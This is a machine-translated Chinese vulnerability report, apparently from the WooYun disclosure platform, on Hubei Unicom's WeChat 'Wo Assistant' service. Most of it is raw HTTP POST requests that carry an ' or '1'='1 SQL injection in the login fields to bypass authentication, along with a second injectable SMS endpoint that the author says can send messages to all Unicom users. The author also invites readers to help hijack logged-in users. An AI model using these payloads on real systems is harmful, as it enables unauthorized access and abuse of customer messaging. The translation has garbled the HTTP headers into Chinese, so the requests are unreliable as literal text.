湖北联通官方微信沃助手任意登录与2处SQL注入

漏洞标题 湖北联通官方微信沃助手任意登录与2处SQL注入 相关厂商 湖北联通 漏洞作者 SoulHunter 提交时间 2016-05-04 18:30 公开时间 2016-06-20 17:40 漏…

漏洞标题 湖北联通官方微信沃助手登录和2个SQL注入 相关制造商 湖北联通 漏洞作者 SoulHunter 提交时间 2016-05-04 18: 30 公共时间 2016-06-20 17: 40 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 已提交给第三方合作机构(cncert National Internet Emergency Center) 标签标签 Oracle,字符类型注入,通用密码 漏洞详细信息 问题出在这个地址:**。**。**。**: 9988 / 首先是登录界面: POST /userLogin.do?method=login HTTP/1.1 主机: **。**。**。**: 9988 代理连接:保持活动状态 内容长度: 83 高速缓存控制: max-age=0 接受: text/html,application/xhtml + xml,application/xml; q=0.9,image/webp,*/*; q=0.8 原点: **。**。**。**: 9988 升级 - 不安全请求: 1 用户代理: Mozilla/5.0(Windows NT 10.0; WOW64)AppleWebKit/537.36(KHTML,与Gecko一样)Chrome/49.0.2623.87 Safari/537.36 内容类型: application/x-www-form-urlencoded Referer: **。**。**。**: 9988/login.html?msg=%25E7%2594%25A8%25E6%2588%25B7%25E5%2590%258D%25E6%2588%2596%25E5%25AF %2586%25E7%25A0%2581%25E9%2594%2599%25E8%25AF%25AF%25EF%25BC%2581 Accept-Encoding: gzip,deflate Accept-Language: zh-CN,zh; q=0.8 Cookie: JSESSIONID=B3C2A0D5A059FE7F19BCE2C0FD8E4370;电子邮件=13888888888;密码=13888888888; isstorePwd=YES 用户名=13888888888'或'1'='1&密码=13888888888'或'1'='1 绕过验证 并且存在SQL注入问题。 第二个地方是:发送短信界面 POST /sellMain.do?method=sendmsg HTTP/1.1 主机: **。**。**。**: 9988 代理连接:保持活动状态 内容长度: 24 接受: text/plain,*/*; Q=0.01 原点:http://**。**。**。**: 9988 X-Requested-With: XMLHttpRequest 用户代理: Mozilla/5.0(Windows NT 10.0; WOW64)AppleWebKit/537.36(KHTML,与Gecko一样)Chrome/49.0.2623.87 Safari/537.36 内容类型: application/x-www-form-urlencoded;字符集=UTF-8 Referer:http://**。**。**。**: 9988/openOrder.html?id=8a5f82ca4f825e83014f82cd61440004& phone= Accept-Encoding: gzip,deflate Accept-Language: zh-CN,zh; q=0.8 Cookie: email=13339718222;密码=111111; isstorePwd=无; JSESSIONID=2948C8DADD9D0F7FFD4B4FFC307A1800 手机=13339718222

有没有谁知道如何使用通用密码来控制登录用户?我认为这应该是可能的。请教! 漏洞证明:

然后,您可以使用SMS界面向所有联通用户发送SMS数据包。 修理计划: 过滤 版权声明:请注明出处SoulHunter @乌云